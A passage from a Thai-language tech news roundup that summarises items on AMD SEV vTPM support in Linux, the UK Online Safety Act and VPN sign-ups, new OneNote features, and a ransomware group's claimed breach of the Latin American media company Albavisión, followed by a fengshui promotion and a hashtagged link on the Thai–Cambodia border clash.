(attestation) ต้องใช้เครื่องมือเฉพาะและการทดสอบอย่างละเอียด ⛔ ต้องใช้ AMD SEV tools และ kernel boot parameters เช่น amd_sev.debug=1 ⛔ หากไม่ตรวจสอบอย่างถูกต้อง อาจเกิดช่องโหว่ด้านความปลอดภัย https://linuxconfig.org/comprehensive-amd-sev-vtpm-support-in-linux-kernel-6-16-enhances-confidential-computing

📣 เรื่องเล่าจากสหราชอาณาจักร: เมื่อ “ความปลอดภัยออนไลน์” กลายเป็นภัยต่อสิทธิส่วนบุคคล กฎหมาย Online Safety Act ของสหราชอาณาจักรมีเป้าหมายเพื่อปกป้องเด็กจากเนื้อหาออนไลน์ที่เป็นอันตราย เช่น สื่อลามก การยุยงให้ทำร้ายตัวเอง หรือการใช้สารเสพติด โดยบังคับให้เว็บไซต์และแอปต่างๆ ต้องตรวจสอบอายุผู้ใช้ก่อนเข้าถึงเนื้อหาเหล่านี้ แต่การตรวจสอบอายุที่ใช้เทคโนโลยีอย่างการสแกนใบหน้า บัตรประชาชน หรือบัตรเครดิต กลับสร้างความกังวลอย่างหนักในหมู่ผู้เชี่ยวชาญด้านสิทธิดิจิทัล เพราะมันอาจนำไปสู่การละเมิดความเป็นส่วนตัว การเฝ้าระวัง และการเซ็นเซอร์เนื้อหาโดยไม่จำเป็น ผลกระทบที่เกิดขึ้นทันทีคือการหลั่งไหลของผู้ใช้งานไปยังแอป VPN เพื่อหลบเลี่ยงการตรวจสอบอายุ โดย Proton VPN รายงานว่ามีผู้สมัครใช้งานเพิ่มขึ้นกว่า 1,400% ภายในไม่กี่ชั่วโมงหลังกฎหมายมีผลบังคับใช้ ✅ กฎหมาย Online Safety Act มีผลบังคับใช้ในสหราชอาณาจักรเมื่อ 25 กรกฎาคม 2025 ➡️ บังคับให้เว็บไซต์ที่มีเนื้อหาสำหรับผู้ใหญ่ต้องตรวจสอบอายุผู้ใช้ ➡️ รวมถึงโซเชียลมีเดีย เกม และแอปหาคู่ ✅ วิธีการตรวจสอบอายุที่ถูกนำมาใช้ ➡️ สแกนใบหน้า ➡️ อัปโหลดบัตรประชาชนหรือบัตรเครดิต ➡️ ใช้บริการตรวจสอบอายุจากบุคคลที่สาม ✅ เกิดกระแสต่อต้านกฎหมายอย่างรุนแรง ➡️ คำร้องให้ยกเลิกกฎหมายมีผู้ลงชื่อกว่า 340,000 คน ➡️ ผู้ริเริ่มคือ Alex Baynham ผู้ก่อตั้งพรรค Build ✅ ผู้ใช้งานแห่ใช้ VPN เพื่อหลบเลี่ยงการตรวจสอบอายุ ➡️ Proton VPN มีผู้สมัครเพิ่มขึ้น 1,400% ➡️ VPN กลายเป็นทางเลือกหลักในการรักษาความเป็นส่วนตัว ✅ ผู้เชี่ยวชาญเตือนถึงความเสี่ยงของการเก็บข้อมูลส่วนตัว ➡️ การละเมิดความเป็นส่วนตัว ➡️ ความเสี่ยงจากการถูกแฮก เช่นกรณีแอป Tea ที่ข้อมูลหลุด https://www.techradar.com/vpn/vpn-privacy-security/over-340-000-brits-want-to-repeal-the-uk-online-safety-act-heres-how-to-get-your-say

📝 เรื่องเล่าจากสมุดโน้ตดิจิทัล: เมื่อ OneNote ฟังเสียงผู้ใช้และปรับปรุงให้ตรงใจ หลายปีที่ผ่านมา ผู้ใช้ OneNote ต้องเจอกับข้อจำกัดที่น่าหงุดหงิด เช่น ไม่สามารถรวมเซลล์ในตารางได้เหมือน Excel หรือ Word และเมื่อคัดลอกข้อความจากเว็บหรืออีเมล ก็จะติดฟอร์แมตแปลก ๆ มาด้วย ทำให้โน้ตดูรกและไม่เป็นระเบียบ แต่ในเดือนกรกฎาคม 2025 Microsoft ได้ปล่อยฟีเจอร์ใหม่สองอย่างที่ตอบโจทย์ผู้ใช้โดยตรง: 1️⃣ Merge Table Cells – รวมเซลล์ในตารางได้ทั้งแนวนอนและแนวตั้ง เพื่อจัดโครงสร้างข้อมูลให้ดูดีและเข้าใจง่าย 2️⃣ Paste Text Only Shortcut – วางข้อความแบบไม่มีฟอร์แมตด้วย Ctrl+Shift+V (Windows) หรือ Cmd+Shift+V (Mac) เพื่อให้โน้ตสะอาดและเป็นระเบียบ ฟีเจอร์เหล่านี้เปิดให้ใช้งานแล้วในเวอร์ชัน Insider บน Windows, Mac และ iPad ส่วน iPhone, Android และเว็บยังรองรับแค่การแสดงผล merged cells แต่ยังสร้างไม่ได้ ✅ OneNote เพิ่มฟีเจอร์ Merge Table Cells ที่ผู้ใช้เรียกร้องมานาน ➡️ รวมเซลล์ได้ทั้งแนวนอนและแนวตั้ง ➡️ ใช้งานผ่านคลิกขวา หรือเมนู Table บน ribbon ✅ รองรับการรวมเซลล์บน Windows, Mac และ iPad แล้ว ➡️ iPhone, Android และเว็บสามารถแสดง merged cells ได้ แต่ยังสร้างไม่ได้ ➡️ ฟีเจอร์กำลังทยอยปล่อยให้ผู้ใช้ทั่วไป ✅ เพิ่มทางลัด Paste Text Only เพื่อวางข้อความแบบไม่มีฟอร์แมต ➡️ ใช้ Ctrl+Shift+V (Windows) หรือ Cmd+Shift+V (Mac) ➡️ มีให้เลือกในเมนูคลิกขวา และเมนู Home > Paste > Keep Text Only ✅ ข้อความที่วางจะรับฟอร์แมตจาก OneNote ไม่ใช่จากต้นทาง ➡️ ลดปัญหาฟอนต์ไม่ตรง สีพื้นหลังแปลก ๆ หรือลิงก์ไม่พึงประสงค์ ➡️ เหมาะกับการรวบรวมข้อมูลจากหลายแหล่งให้ดูสะอาดและสอดคล้องกัน ✅ ฟีเจอร์ทั้งสองเป็นการตอบสนองเสียงผู้ใช้โดยตรง ➡️ Microsoft ยืนยันว่าเป็นฟีเจอร์ที่ได้รับการร้องขอมากที่สุด ➡️ เปิดให้ทดลองใช้งานในกลุ่ม Insider ก่อนปล่อยสู่ผู้ใช้ทั่วไป https://www.neowin.net/news/onenote-is-finally-getting-two-highly-requested-features/

🎙️ เรื่องเล่าจากเบื้องหลังจอ: เมื่อ Albavisión ถูกโจมตีโดย GLOBAL GROUP Albavisión คือเครือข่ายสื่อขนาดใหญ่ที่มีสถานีโทรทัศน์ 45 ช่อง, สถานีวิทยุ 68 แห่ง, โรงภาพยนตร์กว่า 65 แห่ง และสื่อสิ่งพิมพ์ในกว่า 14 ประเทศทั่วละตินอเมริกา ก่อตั้งโดย Remigio Ángel González นักธุรกิจผู้พลิกฟื้นสื่อที่กำลังล้มให้กลับมาทำกำไรด้วยละครท้องถิ่นและภาพยนตร์ฮอลลีวูด แต่ในเดือนกรกฎาคม 2025 GLOBAL GROUP ซึ่งเป็นกลุ่มแรนซัมแวร์แบบ RaaS (Ransomware-as-a-Service) ได้อ้างว่าเจาะระบบของ Albavisión และขโมยข้อมูลกว่า 400 GB โดยใช้เทคนิคการเจรจาแบบใหม่ผ่านแชตบอท AI ที่รองรับหลายภาษา กลุ่มนี้ยังเคยเรียกค่าไถ่สูงถึง 9.5 BTC (ประมาณ 1 ล้านดอลลาร์) จากเหยื่อรายอื่น และมีประวัติการโจมตีองค์กรสื่ออื่น ๆ เช่น RTC ในอิตาลี และ RTE ที่อาจหมายถึงสถานีในไอร์แลนด์ ✅ Albavisión ถูกโจมตีโดยกลุ่ม GLOBAL GROUP และถูกขโมยข้อมูล 400 GB ➡️ เป็นบริษัทสื่อภาษาสเปนขนาดใหญ่ มีฐานอยู่ที่ไมอามี ➡️ ดำเนินกิจการในกว่า 14 ประเทศในละตินอเมริกา ✅ GLOBAL GROUP เป็นกลุ่มแรนซัมแวร์แบบ RaaS ที่เปิดตัวในมิถุนายน 2025 ➡️ ใช้แชตบอท AI เพื่อเจรจากับเหยื่อโดยอัตโนมัติ ➡️ รองรับหลายภาษาเพื่อขยายเป้าหมายทั่วโลก ✅ กลุ่มนี้ขู่จะเปิดเผยข้อมูลหาก Albavisión ไม่เจรจาภายใน 15 วัน ➡️ ใช้เว็บไซต์บนเครือข่าย Tor สำหรับการเจรจาและเผยแพร่ข้อมูล ➡️ มีประวัติการเปิดเผยข้อมูลเหยื่อแล้ว 18 ราย รวมถึงโรงพยาบาล ✅ GLOBAL GROUP มีแนวโน้มมุ่งเป้าไปที่องค์กรสื่อโดยเฉพาะ ➡️ รายชื่อเหยื่อรวมถึง RTC (อิตาลี) และ RTE (อาจเป็นไอร์แลนด์) ➡️ สะท้อนความพยายามในการโจมตีโครงสร้างสื่อสารมวลชน ✅ ผู้ก่อตั้ง Albavisión คือ Remigio Ángel González มูลค่าส่วนตัวราว 2 พันล้านดอลลาร์ ➡️ เป็นนักธุรกิจที่มีชื่อเสียงในการซื้อกิจการสื่อที่ล้มเหลวแล้วพลิกฟื้นให้ทำกำไร ➡️ การโจมตีจึงอาจเป็นการเลือกเป้าหมายอย่างมีนัยสำคัญ https://hackread.com/global-group-ransomware-media-giant-albavision-breach/

FENGSHUI DAILY อัพเดตทุกวัน ที่นี่ที่เดียว สีเสริมดวง เสริมความเฮง ทิศมงคล เวลามงคล อย่าลืมดูกัน เมื่อเริ่มวันใหม่ วันพุธที่ 30 เดือนกรกฎาคม พ.ศ.2568 ___________________________________ FengshuiBizDesigner ฮวงจุ้ย...ออกแบบได้

บันทึกเหตุการณ์การปะทะบริเวณชายแดนไทย–กัมพูชา วันที่ 28 กรกฎาคม 2568 https://www.thai-tai.tv/news/20598/ . #ชายแดนไทยกัมพูชา #กัมพูชารุกราน #จรวดBM21 #ขีปนาวุธPHL03 #ภัยไซเบอร์ #ข่าวเท็จ #ปราสาทตาเมือนธม #ปราสาทตาควาย #พลเรือนเสียชีวิต #ทหารบาดเจ็บ #อพยพประชาชน #กองทัพไทย #ไทยไท